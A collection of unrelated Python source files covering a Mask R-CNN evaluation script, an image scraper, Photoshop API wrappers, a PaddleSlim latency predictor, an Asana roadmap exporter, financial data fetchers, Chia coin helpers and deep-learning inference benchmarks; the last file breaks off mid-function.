# dataset_root_path = r'D:\宜昌\zhiwei_3D\tuyang_json_img'
# os.path.join(ROOT_DIR, "train_data\\train_1")
path = Path(dataset_root_path)
all_json_file = list(path.glob('**/*.json'))
val_json_file, train_json_file = data_split(all_json_file, ratio=0.2, shuffle=True)
train_count = len(train_json_file)
val_count = len(val_json_file)
# Training dataset.
dataset_train = BalloonDataset()
dataset_train.load_balloon(dataset_root_path, train_json_file)
dataset_train.prepare()
# Validation dataset
dataset_val = BalloonDataset()
dataset_val.load_balloon(dataset_root_path, val_json_file)
dataset_val.prepare()
## Detection
# %%
class InferenceConfig(BalloonConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
inference_config = InferenceConfig()
# Recreate the model in inference mode
model = modellib.MaskRCNN(mode="inference",
config=inference_config,
model_dir=MODEL_DIR)
# Get path to saved weights
# Either set a specific path or find last trained weights
model_path = r"E:\GitHub_Projects\Mask_RCNN_master\logs\mask_rcnn_balloon_0030.h5"
# model_path = r"D:\宜昌\zhiwei_3D\tuyang_json_img\mask_rcnn_balloon_0030.h5"
# model_path = model.find_last()
# Load trained weights
print("Loading weights from ", model_path)
model.load_weights(model_path, by_name=True)
# %%
# Test on a random image
image_id = random.choice(dataset_val.image_ids)
original_image, image_meta, gt_class_id, gt_bbox, gt_mask = \
modellib.load_image_gt(dataset_val, inference_config,
image_id, use_mini_mask=False)
log("original_image", original_image)
log("image_meta", image_meta)
log("gt_class_id", gt_class_id)
log("gt_bbox", gt_bbox)
log("gt_mask", gt_mask)
visualize.display_instances(original_image, gt_bbox, gt_mask, gt_class_id,
dataset_train.class_names, figsize=(8, 8))
# %%
results = model.detect([original_image], verbose=1)
r = results[0]
visualize.display_instances(original_image, r['rois'], r['masks'], r['class_ids'],
dataset_val.class_names, r['scores'], ax=get_ax())
# %% md
## Evaluation
# %%
# Compute VOC-Style mAP @ IoU=0.5
# Running on 10 images. Increase for better accuracy.
image_ids = np.random.choice(dataset_val.image_ids, 10)
APs = []
for image_id in image_ids:
# Load image and ground truth data
image, image_meta, gt_class_id, gt_bbox, gt_mask = \
modellib.load_image_gt(dataset_val, inference_config,
image_id, use_mini_mask=False)
molded_images = np.expand_dims(modellib.mold_image(image, inference_config), 0)
# Run object detection
results = model.detect([image], verbose=0)
r = results[0]
# Compute AP
AP, precisions, recalls, overlaps = \
utils.compute_ap(gt_bbox, gt_class_id, gt_mask,
r["rois"], r["class_ids"], r["scores"], r['masks'])
APs.append(AP)
print("mAP: ", np.mean(APs))
``` |
{
"source": "1372143376/python27",
"score": 3
} |
#### File: python27/image/imgs.py
```python
import re
import urllib
import urllib2
import os
def getHtml(url):
page=urllib.urlopen(url)
html=page.read()
return html
def getImg(html):
reg=r'"objURL":"(.*?)"'
imgre=re.compile(reg)
imglist=re.findall(imgre,html)
print imgre
l=len(imglist)
print l
return imglist
def downLoad(urls,path):
index=1
for url in urls:
print("downind",url)
filename=os.path.join(path,str(index)+".jpg")
urllib.urlretrieve(url,filename)
index+=1
html=getHtml("https://image.baidu.com/search/index?ct=201326592&cl=2&st=-1&lm=-1&nc=1&ie=utf-8&tn=baiduimage&ipn=r&rps=1&pv=&fm=rs2&word=%E8%B6%85%E7%BA%A7%E6%90%9E%E7%AC%91%E5%9B%BE%E7%89%87%E7%AC%91%E6%AD%BB%E4%BA%BA&oriquery=%E6%9C%80%E8%BF%91%E5%BE%88%E7%81%AB%E7%9A%84%E6%90%9E%E7%AC%91%E5%9B%BE%E7%89%87&ofr=%E6%9C%80%E8%BF%91%E5%BE%88%E7%81%AB%E7%9A%84%E6%90%9E%E7%AC%91%E5%9B%BE%E7%89%87&hs=2")
Savepath="D:\soft\python27\image\imgs"
downLoad(getImg(html),Savepath)
```
#### File: setuptools/tests/test_develop.py
```python
import sys
import os, shutil, tempfile, unittest
import tempfile
import site
from StringIO import StringIO
from distutils.errors import DistutilsError
from setuptools.command.develop import develop
from setuptools.command import easy_install as easy_install_pkg
from setuptools.dist import Distribution
SETUP_PY = """\
from setuptools import setup
setup(name='foo')
"""
class TestDevelopTest(unittest.TestCase):
def setUp(self):
self.dir = tempfile.mkdtemp()
setup = os.path.join(self.dir, 'setup.py')
f = open(setup, 'w')
f.write(SETUP_PY)
f.close()
self.old_cwd = os.getcwd()
os.chdir(self.dir)
if sys.version >= "2.6":
self.old_base = site.USER_BASE
site.USER_BASE = tempfile.mkdtemp()
self.old_site = site.USER_SITE
site.USER_SITE = tempfile.mkdtemp()
def tearDown(self):
os.chdir(self.old_cwd)
shutil.rmtree(self.dir)
if sys.version >= "2.6":
shutil.rmtree(site.USER_BASE)
shutil.rmtree(site.USER_SITE)
site.USER_BASE = self.old_base
site.USER_SITE = self.old_site
def test_develop(self):
if sys.version < "2.6":
return
dist = Distribution()
dist.script_name = 'setup.py'
cmd = develop(dist)
cmd.user = 1
cmd.ensure_finalized()
cmd.install_dir = site.USER_SITE
cmd.user = 1
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
cmd.run()
finally:
sys.stdout = old_stdout
# let's see if we got our egg link at the right place
content = os.listdir(site.USER_SITE)
content.sort()
self.assertEquals(content, ['UNKNOWN.egg-link', 'easy-install.pth'])
def test_develop_with_setup_requires(self):
wanted = ("Could not find suitable distribution for "
"Requirement.parse('I-DONT-EXIST')")
old_dir = os.getcwd()
os.chdir(self.dir)
try:
try:
dist = Distribution({'setup_requires': ['I_DONT_EXIST']})
except DistutilsError, e:
error = str(e)
if error == wanted:
pass
finally:
os.chdir(old_dir)
``` |
{
"source": "13751742405/photoshop-python-api",
"score": 3
} |
#### File: photoshop-python-api/examples/_psd_files.py
```python
import os
def get_psd_files():
files = {}
this_root = os.path.dirname(__file__)
file_root = os.path.join(this_root, "files")
for file_name in os.listdir(file_root):
files[file_name] = os.path.join(file_root, file_name)
return files
```
#### File: photoshop/api/action_reference.py
```python
from ._core import Photoshop
from .enumerations import ReferenceFormType
class ActionReference(Photoshop):
object_name = "ActionReference"
def __init__(self, parent=None):
super().__init__(parent=parent)
def getContainer(self):
return self.app.getContainer()
def getDesiredClass(self):
return self.app.getDesiredClass()
def getEnumeratedType(self) -> int:
return self.app.getEnumeratedType()
def getEnumeratedValue(self) -> int:
return self.app.getEnumeratedValue()
def getForm(self) -> ReferenceFormType:
"""Gets the form of this action reference."""
return ReferenceFormType(self.app.getForm())
def getIdentifier(self) -> int:
"""Gets the identifier value for a reference whose form is
identifier."""
return self.app.getIdentifier()
def getIndex(self) -> int:
"""Gets the index value for a reference in a list or array,"""
return self.app.getIndex()
def putName(self, key, value):
return self.app.putName(key, value)
def putClass(self, value):
return self.app.putClass(value)
def putEnumerated(self, desired_class, enum_type, value):
"""Puts an enumeration type and ID into a reference along with the
desired class for the reference."""
return self.app.putEnumerated(desired_class, enum_type, value)
def putIdentifier(self, desired_class, value):
return self.app.putIdentifier(desired_class, value)
def putIndex(self, desired_class, value):
return self.app.putIndex(desired_class, value)
def putOffset(self, desired_class, value):
return self.app.putOffset(desired_class, value)
def putProperty(self, desired_class, value):
return self.app.putProperty(desired_class, value)
```
#### File: photoshop/api/_documentinfo.py
```python
from pprint import pformat
# Import local modules
from ._core import Photoshop
# pylint: disable=too-many-public-methods
class DocumentInfo(Photoshop):
"""Metadata about a document object."""
def __init__(self, parent):
super().__init__(parent=parent)
def __str__(self):
return pformat(
{
"author": self.author,
"authorPosition": self.authorPosition,
"caption": self.caption,
"captionWriter": self.captionWriter,
"category": self.category,
"city": self.city,
"country": self.country,
"copyrightNotice": self.copyrightNotice,
"copyrighted": self.copyrighted,
"creationDate": self.creationDate,
"credit": self.credit,
"exif": self.exif,
"headline": self.headline,
"instructions": self.instructions,
"jobName": self.jobName,
"keywords": self.keywords,
"provinceState": self.provinceState,
"source": self.source,
"ownerUrl": self.ownerUrl,
"supplementalCategories": self.supplementalCategories,
"title": self.title,
"transmissionReference": self.transmissionReference,
"urgency": self.urgency,
}
)
@property
def author(self):
"""str: The author."""
return self.app.author
@author.setter
def author(self, name):
self.app.author = name
@property
def authorPosition(self):
"""str:The author’s position."""
return self.app.authorPosition
@authorPosition.setter
def authorPosition(self, name):
self.app.authorPosition = name
@property
def caption(self):
return self.app.caption
@caption.setter
def caption(self, name):
self.app.caption = name
@property
def captionWriter(self):
return self.app.captionWriter
@captionWriter.setter
def captionWriter(self, name):
self.app.captionWriter = name
@property
def category(self):
"""str: The document category."""
return self.app.category
@category.setter
def category(self, name):
self.app.category = name
@property
def city(self):
return self.app.city
@city.setter
def city(self, city_name):
self.app.city = city_name
@property
def copyrightNotice(self):
"""str: The copyright notice."""
return self.app.copyrightNotice
@copyrightNotice.setter
def copyrightNotice(self, name):
self.app.copyrightNotice = name
@property
def copyrighted(self):
"""str: The copyright status."""
return self.app.copyrighted
@copyrighted.setter
def copyrighted(self, info):
self.app.copyrighted = info
@property
def country(self):
return self.app.country
@country.setter
def country(self, name):
self.app.country = name
@property
def creationDate(self):
return self.app.creationDate
@creationDate.setter
def creationDate(self, name):
self.app.creationDate = name
@property
def credit(self):
"""str: The author credit."""
return self.app.credit
@credit.setter
def credit(self, value):
self.app.credit = value
@property
def exif(self):
return self.app.exif
@exif.setter
def exif(self, info):
self.app.exif = info
@property
def headline(self):
return self.app.headline
@headline.setter
def headline(self, value):
self.app.headline = value
@property
def instructions(self):
return self.app.instructions
@instructions.setter
def instructions(self, value):
self.app.instructions = value
@property
def jobName(self):
return self.app.jobName
@jobName.setter
def jobName(self, job):
self.app.jobName = job
@property
def keywords(self):
return self.app.keywords
@keywords.setter
def keywords(self, words):
self.app.keywords = words
@property
def ownerUrl(self):
return self.app.ownerUrl
@ownerUrl.setter
def ownerUrl(self, url):
self.app.ownerUrl = url
@property
def provinceState(self):
"""str: The state or province."""
return self.app.provinceState
@provinceState.setter
def provinceState(self, state_name):
self.app.provinceState = state_name
@property
def source(self):
return self.app.source
@source.setter
def source(self, source_name):
self.app.source = source_name
@property
def supplementalCategories(self):
"""str: Other categories."""
return self.app.supplementalCategories
@supplementalCategories.setter
def supplementalCategories(self, info):
self.app.supplementalCategories = info
@property
def title(self):
return self.app.title
@title.setter
def title(self, name):
self.app.title = name
@property
def transmissionReference(self):
"""str: The transmission reference."""
return self.app.transmissionReference
@transmissionReference.setter
def transmissionReference(self, reference):
self.app.transmissionReference = reference
@property
def urgency(self):
"""The document urgency."""
return self.app.urgency
@urgency.setter
def urgency(self, status):
self.app.urgency = status
```
#### File: api/open_options/eps.py
```python
from .._core import Photoshop
class EPSOpenOptions(Photoshop):
"""Options for saving a document in EPS format.
using the `Document.saveAs()`
"""
object_name = "EPSOpenOptions"
def __init__(self):
super().__init__()
@property
def antiAlias(self):
return self.app.antiAlias
@property
def constrainProportions(self):
return self.app.constrainProportions
@property
def height(self):
return self.app.height
@property
def mode(self):
return self.app.mode
@property
def resolution(self):
return self.app.resolution
@property
def width(self):
return self.app.width
@property
def embedColorProfile(self):
return self.app.embedColorProfile
@embedColorProfile.setter
def embedColorProfile(self, boolean):
self.app.embedColorProfile = boolean
```
#### File: photoshop/api/solid_color.py
```python
from ._core import Photoshop
from .colors.cmyk import CMYKColor
from .colors.gray import GrayColor
from .colors.hsb import HSBColor
from .colors.lab import LabColor
from .colors.rgb import RGBColor
from .enumerations import ColorModel
class SolidColor(Photoshop):
object_name = "SolidColor"
def __init__(self, parent=None):
super().__init__(parent=parent)
@property
def cmyk(self) -> CMYKColor:
"""The CMYK color mode.
Returns:
.colors.cmyk.CMYKColor:
"""
return CMYKColor(self.app.cmyk)
@cmyk.setter
def cmyk(self, value: CMYKColor):
self.app.cmyk = value
@property
def gray(self) -> GrayColor:
return GrayColor(self.app.gray)
@property
def hsb(self) -> HSBColor:
return HSBColor(self.app.hsb)
@hsb.setter
def hsb(self, value: HSBColor):
self.app.hsb = value
@property
def lab(self) -> LabColor:
return LabColor(self.app.lab)
@lab.setter
def lab(self, value: LabColor):
self.app.lab = value
@property
def model(self) -> ColorModel:
"""The color model."""
return ColorModel(self.app.model)
@model.setter
def model(self, value: ColorModel):
"""The color model."""
self.app.model = value
@property
def nearestWebColor(self) -> RGBColor:
"""The nearest web color to the current color."""
return RGBColor(self.app.NearestWebColor)
@property
def rgb(self) -> RGBColor:
"""The RGB color mode."""
return RGBColor(self.app.rgb)
@rgb.setter
def rgb(self, value: RGBColor):
self.app.rgb = value
def isEqual(self, color: RGBColor):
"""`SolidColor` object is visually equal to the specified color."""
return self.app.isEqual(color)
``` |
{
"source": "1375207619/PaddleSlim",
"score": 3
} |
#### File: paddleslim/analysis/latency_predictor.py
```python
import os
import pickle
import shutil
import subprocess
from .parse_ops import get_key_from_op
from .extract_features import get_data_from_tables, get_features_from_paramkey
from ._utils import opt_model, load_predictor, nearest_interpolate
import paddle
import paddleslim
import warnings
__all__ = ["LatencyPredictor", "TableLatencyPredictor"]
def format_Warning(message, category, filename, lineno, line=''):
return str(filename) + ':' + str(
lineno) + ': ' + category.__name__ + ': ' + str(message) + '\n'
warnings.formatwarning = format_Warning
class LatencyPredictor(object):
"""Base class of latency predictor.
"""
def predict_latency(self, model):
"""Get latency of model. It is an abstract method.
Args:
model: The model to be evaluated.
Returns:
latency(float): The latency of given model on current evaluator.
"""
raise NotImplementedError('Abstract method.')
def _get_key_info_from_graph(self, graph):
graph_keys = []
for op in graph.ops():
param_key = get_key_from_op(op)
graph_keys.append(param_key)
return graph_keys
class TableLatencyPredictor(LatencyPredictor):
"""The preditor used to get pbmodel's latency on some devices and infer engines.
Args:
table_file(str): The path of file that records the device latency of operators.
"""
def __init__(self, table_file='SD710'):
self.table_file = table_file
self.table_dict = {}
self.hardware = None
self.threads = None
self.predictor_state = False
self.predictor = {}
self._initial_table()
def _initial_table(self):
if self.table_file in ['SD625', 'SD710', 'SD845', 'SD865']:
self.hardware = self.table_file
self.threads = 4
self.table_file = f'{self.hardware}_threads_4_power_mode_0.pkl'
if self.hardware in ['SD625', 'SD710']:
self.predictor_state = True
if not os.path.exists(self.table_file):
subprocess.call(
f'wget https://paddlemodels.bj.bcebos.com/PaddleSlim/analysis/{self.table_file}',
shell=True)
assert os.path.exists(
self.table_file
), f'{self.table_file} does not exist. If you want to use our table files, please set \'table_file\' in [SD625, SD710, SD845, SD865]'
with open(self.table_file, 'rb') as f:
self.table_dict = pickle.load(f)
print('Successfully load {}'.format(self.table_file))
def _change_table(self, threads=4):
assert threads == 4, 'Only 4 threads are available now.'
self.table_file = f'{self.hardware}_threads_{threads}_power_mode_0.pkl'
if not os.path.exists(self.table_file):
subprocess.call(
f'wget https://paddlemodels.bj.bcebos.com/PaddleSlim/analysis/{self.table_file}',
shell=True)
with open(self.table_file, 'rb') as f:
self.table_dict = pickle.load(f)
print('Successfully loaded {}'.format(self.table_file))
def _get_input_shape(self, graph):
in_shape = []
for op in graph.ops():
param_key = get_key_from_op(op)
if param_key != '':
in_shape = op.all_inputs()[-1].shape()
break
return in_shape
def _preload_predictor(self, data_type='fp32'):
op_types = [
'depthwise_conv2d', 'conv2d', 'pool2d', 'matmul', 'elementwise_add',
'elementwise_mul', 'concat', 'calib', 'swish'
]
op_dir = self.table_file.split('.')[0] + '_batchsize_1'
for op_type in op_types:
model = load_predictor(op_type, op_dir, data_type)
key = op_type
if 'conv2d' in op_type:
key = f'{op_type}_{data_type}'
self.predictor[key] = model
def predict(self,
model_file,
param_file,
data_type,
threads=4,
input_shape=None):
"""predict the latency of the model
Args:
model_file(str), param_file(str): The inference model(*.pdmodel, *.pdiparams).
data_type(str): Data type, fp32, fp16 or int8.
threads(int): threads num
input_shape(list): Generally, the input shape is confirmed when saving the inference model and the parameter is only effective for input shape that has variable length.
Returns:
latency(float): The latency of the model.
"""
assert data_type in ['fp32', 'int8', 'fp16'
], f'data_type must be one of [fp32, int8, fp16]'
if self.hardware and self.threads != threads:
self._change_table(threads)
if self.predictor_state and f'conv2d_{data_type}' not in self.predictor:
self._preload_predictor(data_type)
enable_fp16 = True if data_type == 'fp16' else False
pbmodel_file = opt_model(
model_file=model_file,
param_file=param_file,
optimize_out_type='protobuf',
enable_fp16=enable_fp16)
paddle.enable_static()
with open(pbmodel_file, "rb") as f:
fluid_program = paddle.fluid.framework.Program.parse_from_string(
f.read())
graph = paddleslim.core.GraphWrapper(fluid_program)
if input_shape != None:
ori_shape = self._get_input_shape(graph)
assert ori_shape == input_shape, "The parameter \'input_shape\' dosn't work for now. The input shape is fixed when saving the inference model"
latency = 0.0
new_op = {}
for op in graph.ops():
param_key = get_key_from_op(op)
if param_key == '':
continue
if param_key == None:
if op.type() in new_op:
new_op[op.type()] += 1
else:
new_op.update({op.type(): 1})
continue
if param_key in self.table_dict:
latency += self.table_dict[param_key]
elif self.predictor_state:
latency += self.op_predictor(op.type(), param_key, data_type)
if len(new_op) != 0:
warnings.warn(
"These ops are not currently supported. Please raise an issue in PaddleSlim if you find the CalledTimes is large enough to affect the accuracy."
)
warnings.warn("OperatorType\tCalledTimes")
for key in new_op:
warnings.warn(f"{key.ljust(15)}\t{new_op[key]}")
shutil.rmtree(os.path.dirname(pbmodel_file))
return latency
def op_predictor(self, op_type, param_key, data_type):
"""predict the latency of the operator which is not in the table
Args:
op_type: The operator's type
param_key: The operator's parameter information.
data_type: Data type, fp32 or int8.
Returns:
latency(float): The latency of the operator.
"""
latency = 0.0
if op_type in [
'depthwise_conv2d', 'conv2d', 'pool2d', 'matmul',
'elementwise_add', 'elementwise_mul', 'concat', 'calib', 'swish'
]:
key = op_type
if 'conv2d' in op_type:
key = f'{op_type}_{data_type}'
predictor = self.predictor[key]
features = get_features_from_paramkey(param_key, op_type, data_type)
latency = predictor.predict([features])
else:
data = get_data_from_tables(
table_dict=self.table_dict,
op_type=op_type,
data_type=data_type)
features = get_features_from_paramkey(param_key, op_type, data_type)
latency = nearest_interpolate(features, data)
assert latency != None, f'{param_key} is not in the table.'
return latency
```
#### File: PaddleSlim/tests/test_unstructured_pruner_quant.py
```python
import sys
sys.path.append("../")
import unittest
from static_case import StaticCase
import paddle.fluid as fluid
import paddle
from paddleslim.prune import UnstructuredPruner
from layers import conv_bn_layer
import numpy as np
class TestStaticMasks(StaticCase):
def _update_masks(self, pruner, t):
for param in pruner.masks:
mask_name = pruner.masks[param]
t_param = pruner.scope.find_var(param).get_tensor()
t_mask = pruner.scope.find_var(mask_name).get_tensor()
v_param = np.array(t_param)
v_mask = (np.abs(v_param) < t).astype(v_param.dtype)
t_mask.set(v_mask, pruner.place)
def test_set_static_masks(self):
main_program = paddle.static.default_main_program()
startup_program = paddle.static.default_startup_program()
with paddle.static.program_guard(main_program, startup_program):
input = paddle.static.data(name='image', shape=[None, 3, 16, 16])
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
conv1 = conv_bn_layer(input, 8, 1, "conv1")
conv2 = conv_bn_layer(conv1, 8, 1, "conv2")
conv3 = fluid.layers.conv2d_transpose(
input=conv2, num_filters=16, filter_size=2, stride=2)
predict = fluid.layers.fc(input=conv3, size=10, act='softmax')
cost = fluid.layers.cross_entropy(input=predict, label=label)
adam_optimizer = fluid.optimizer.AdamOptimizer(0.01)
avg_cost = fluid.layers.mean(cost)
adam_optimizer.minimize(avg_cost)
place = paddle.static.cpu_places()[0]
exe = paddle.static.Executor(place)
scope = paddle.static.global_scope()
exe.run(startup_program, scope=scope)
pruner = UnstructuredPruner(
main_program, 'ratio', scope=scope, place=place)
self._update_masks(pruner, 0.0)
pruner.update_params()
self._update_masks(pruner, 1.0)
pruner.set_static_masks()
sparsity_0 = pruner.total_sparse(main_program)
x = np.random.random(size=(10, 3, 16, 16)).astype('float32')
label = np.random.random(size=(10, 1)).astype('int64')
loss_data, = exe.run(main_program,
feed={"image": x,
"label": label},
fetch_list=[cost.name])
sparsity_1 = UnstructuredPruner.total_sparse(main_program)
pruner.update_params()
sparsity_2 = UnstructuredPruner.total_sparse(main_program)
print(sparsity_0, sparsity_1, sparsity_2)
self.assertEqual(sparsity_0, 1.0)
self.assertLess(abs(sparsity_2 - 1), 0.001)
self.assertLess(sparsity_1, 1.0)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "13767849/akshare",
"score": 2
} |
#### File: akshare/economic/macro_other.py
```python
import json
import time
import pandas as pd
import requests
from akshare.economic.cons import bitcoin_url, bitcoin_payload
def get_js_dc_current():
"""
主流数字货币的实时行情数据, 一次请求返回具体某一时刻行情数据
:return: pandas.DataFrame
"""
bit_payload = bitcoin_payload.copy()
bit_payload.update({"_": int(time.time() * 1000)})
bit_payload.update(
{
"jsonpCallback": bitcoin_payload["jsonpCallback"].format(
int(time.time() * 1000)
)
}
)
res = requests.get(bitcoin_url, params=bit_payload)
json_data = json.loads(res.text[res.text.find("{"): res.text.rfind("}") + 1])
data_df = pd.DataFrame(json_data["data"])
data_df.set_index("update", drop=True, inplace=True)
data_df.index = pd.to_datetime(data_df.index)
return data_df.iloc[:, :-4]
def macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07"):
"""
金十数据-外汇-投机情绪报告
外汇投机情绪报告显示当前市场多空仓位比例,数据由8家交易平台提供,涵盖11个主要货币对和1个黄金品种。
报告内容: 品种: 澳元兑日元、澳元兑美元、欧元兑美元、欧元兑澳元、欧元兑日元、英镑兑美元、英镑兑日元、纽元兑美元、美元兑加元、美元兑瑞郎、美元兑日元以及现货黄金兑美元。
数据: 由Shark - fx整合全球8家交易平台( 包括Oanda、 FXCM、 Insta、 Dukas、 MyFxBook以及FiboGroup) 的多空投机仓位数据而成。
名词释义: 外汇投机情绪报告显示当前市场多空仓位比例,数据由8家交易平台提供,涵盖11个主要货币对和1个黄金品种。
工具使用策略: Shark-fx声明表示,基于“主流通常都是错误的”的事实,当空头头寸超过60%,交易者就应该建立多头仓位; 同理,当市场多头头寸超过60%,交易者则应该建立空头仓位。此外,当多空仓位比例接近50%的情况下,我们则倾向于建议交易者不要进场,保持观望。
https://datacenter.jin10.com/reportType/dc_ssi_trends
:param start_date: 具体交易日
:type start_date: str
:param end_date: 具体交易日, 与 end_date 相同
:type end_date: str
:return: 投机情绪报告
:rtype: pandas.DataFrame
"""
url = "https://datacenter-api.jin10.com/sentiment/datas"
params = {
"start_date": start_date,
"end_date": end_date,
"currency_pair": "",
"_": int(time.time() * 1000),
}
headers = {
"accept": "*/*",
"accept-encoding": "gzip, deflate, br",
"accept-language": "zh-CN,zh;q=0.9,en;q=0.8",
"cache-control": "no-cache",
"origin": "https://datacenter.jin10.com",
"pragma": "no-cache",
"referer": "https://datacenter.jin10.com/reportType/dc_ssi_trends",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-site",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
"x-app-id": "rU6QIu7JHe2gOUeR",
"x-csrf-token": "",
"x-version": "1.0.0",
}
res = requests.get(url, params=params, headers=headers)
return pd.DataFrame(res.json()["data"]["values"])
if __name__ == "__main__":
get_js_dc_current_df = get_js_dc_current()
print(get_js_dc_current_df)
macro_fx_sentiment_df = macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07")
print(macro_fx_sentiment_df)
``` |
{
"source": "13767849/chia-blockchain",
"score": 2
} |
#### File: src/consensus/coinbase.py
```python
from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey
from src.types.blockchain_format.coin import Coin
from src.types.blockchain_format.sized_bytes import bytes32
from src.util.ints import uint32, uint64
from src.wallet.puzzles.p2_delegated_puzzle_or_hidden_puzzle import puzzle_for_pk
def create_puzzlehash_for_pk(pub_key: G1Element) -> bytes32:
return puzzle_for_pk(bytes(pub_key)).get_tree_hash()
def signature_for_coinbase(coin: Coin, pool_private_key: PrivateKey):
# noinspection PyTypeChecker
return G2Element.from_bytes(bytes(AugSchemeMPL.sign(pool_private_key, bytes(coin))))
def sign_coinbase_coin(coin: Coin, private_key: PrivateKey):
if private_key is None:
raise ValueError("unknown private key")
return signature_for_coinbase(coin, private_key)
def pool_parent_id(block_height: uint32, genesis_challenge: bytes32) -> uint32:
return bytes32(genesis_challenge[:16] + block_height.to_bytes(16, "big"))
def farmer_parent_id(block_height: uint32, genesis_challenge: bytes32) -> uint32:
return bytes32(genesis_challenge[16:] + block_height.to_bytes(16, "big"))
def create_pool_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
parent_id = pool_parent_id(block_height, genesis_challenge)
return Coin(parent_id, puzzle_hash, reward)
def create_farmer_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
parent_id = farmer_parent_id(block_height, genesis_challenge)
return Coin(parent_id, puzzle_hash, reward)
``` |
{
"source": "137717unity/ccos-scripts",
"score": 3
} |
#### File: ccos-scripts/search_roadmap_export/search_roadmap_export.py
```python
import os
import json
# Third-party
import asana
from github import Github
from config import CONFIG
ASANA_CLIENT = asana.Client.access_token(os.environ["ADMIN_ASANA_TOKEN"])
GITHUB_CLIENT = Github(os.environ["ADMIN_GITHUB_TOKEN"])
"""
databag schema
{
"quarters": [
{
"name": "Q1 2020",
"tasks": [
{
"gid": "",
"name": "",
"description": ""
},
...
]
},
{
"name": "Q2 2020",
"tasks": []
},
...
]
}
"""
def generate_databag():
databag = {
"quarters": []
}
print('Generating Databag...')
for section_name, section_gid in CONFIG['ROADMAP_SECTIONS'].items(): # for section in included sections
print(' Pulling tasks for quarter - {}...'.format(section_name))
tasks = ASANA_CLIENT.tasks.find_by_section( # Get tasks in section
CONFIG['ROADMAP_SECTIONS'][section_name],
opt_fields=['name', 'custom_fields', 'tags.name', 'completed']
)
print(' Done.')
quarter = {
"name": section_name,
"tasks": []
}
print(' Processing tasks...')
for task in tasks:
# if task does not have opt out flag, and is not complete
if has_filtering_tag(task) and not task['completed']:
quarter['tasks'].append({
'gid': task['gid'],
'name': task['name'],
'description': get_public_description(task)
})
print(' Done.')
databag['quarters'].append(quarter)
print(' Pruning quarters...') # remove quarter if it has no tasks
databag['quarters'] = [quarter for quarter in databag['quarters'] if len(quarter['tasks']) != 0]
print(' Done.')
return databag
"""
Indicates if an Asana task has the opt-out tag
"""
def has_filtering_tag(task):
for tag in task['tags']:
if tag['name'] == 'roadmap_ignore':
return False
return True
"""
Gets the Public Description field of an Asana Task
"""
def get_public_description(task):
for field in task['custom_fields']:
if field['name'] == 'Public Description':
return field['text_value']
def push_to_repo(databag):
oss_repo = GITHUB_CLIENT.get_repo("creativecommons/creativecommons.github.io-source")
update = oss_repo.update_file(
path="databags/search_roadmap.json",
message="Update Search Roadmap Databag",
content=json.dumps(databag),
sha=oss_repo.get_contents("databags/search_roadmap.json").sha,
branch="master"
)
return update
print("Pulling from Asana...")
databag = generate_databag()
print("Pull successful.")
print("Pushing page content to open source repo...")
push_data = push_to_repo(databag)
print("Pushed successfully. Commit Info: {}".format(push_data))
``` |
{
"source": "137996047/DeepLearningFrameworks",
"score": 2
} |
#### File: 137996047/DeepLearningFrameworks/pytorch_infer.py
```python
import time
import torch
import pandas as pd
import torchvision.models as models
from utils import give_fake_data, ITER_NUMS
from tqdm import tqdm
class ModelSpeed(object):
def __init__(self, model):
self.cuda_is_available = torch.cuda.is_available()
self.device = torch.device('cpu')
self.model = model.to(self.device)
def test_time(self, data):
# generate inputs data
inputs = torch.tensor(data).to(self.device)
# use mkldnn accelerator
#inputs = inputs.to_mkldnn()
self.model.eval()
with torch.no_grad():
sum_time = 0
sum_num = 0
for idx in range(ITER_NUMS):
#keep t_start, model_inference, t_end procedure synchronize
if self.cuda_is_available:
torch.cuda.synchronize()
t_start = time.time()
self.model(inputs)
if self.cuda_is_available:
torch.cuda.synchronize()
t_end = time.time()
if idx >= 5:
sum_time += t_end - t_start
sum_num += 1
# experiment logs
bs_time = sum_time / sum_num
fps = (1 / bs_time) * data.shape[0]
model_speed_logs.loc[model_speed_logs.shape[0], :] = [model_name, bs, bs_time, fps]
if __name__ == '__main__':
model_names = ['resnet18', 'resnet50']
batch_size = [1, 2, 4, 8]
model_speed_logs = pd.DataFrame(columns = ['model_name', 'bs', 'bs_time', 'fps'])
# set dtype include input_data and model_parameters
torch.set_default_dtype(torch.float)
#different models
for model_name in model_names:
print('-'*15, model_name, '-'*15)
model = getattr(models, model_name)(pretrained=True)
model_speed = ModelSpeed(model)
# different batch size
for bs in tqdm(batch_size):
data_cl,data_cf = give_fake_data(bs)
model_speed.test_time(data_cf)
model_speed_logs.to_csv('./result/pytorch_model_speed_experiments.csv', index = False)
```
#### File: 137996047/DeepLearningFrameworks/tf_infer.py
```python
import time
import tensorflow as tf
import os.path as osp
import pandas as pd
from tqdm import tqdm
from utils import give_fake_data, ITER_NUMS
from tensorflow.contrib.slim.nets import resnet_v2 as models
class ModelSpeed(object):
def __init__(self, model_name):
self.input_tensor = tf.placeholder(tf.float32, shape=(None,224,224,3), name='input_image')
self.sess = tf.Session()
arg_scope = models.resnet_arg_scope()
with tf.contrib.slim.arg_scope(arg_scope):
self.net, end_points = getattr(models, model_name)(self.input_tensor, 1001, is_training=False)
saver = tf.train.Saver()
saver.restore(self.sess, osp.join('./models/tf/', model_name + '.ckpt'))
def test_time(self, data):
sum_time = 0
sum_num = 0
for idx in range(ITER_NUMS):
t_start = time.time()
self.sess.run(self.net, feed_dict={self.input_tensor: data})
t_end = time.time()
if idx >= 5:
sum_time += t_end - t_start
sum_num += 1
# experiment logs
bs_time = sum_time / sum_num
fps = (1 / bs_time) * data.shape[0]
model_speed_logs.loc[model_speed_logs.shape[0], :] = [model_name, bs, bs_time, fps]
if __name__ == '__main__':
model_names = ['resnet_v2_50']
batch_size = [1, 2, 4, 8]
model_speed_logs = pd.DataFrame(columns = ['model_name', 'bs', 'bs_time', 'fps'])
#different models
for model_name in model_names:
print('-'*15, model_name, '-'*15)
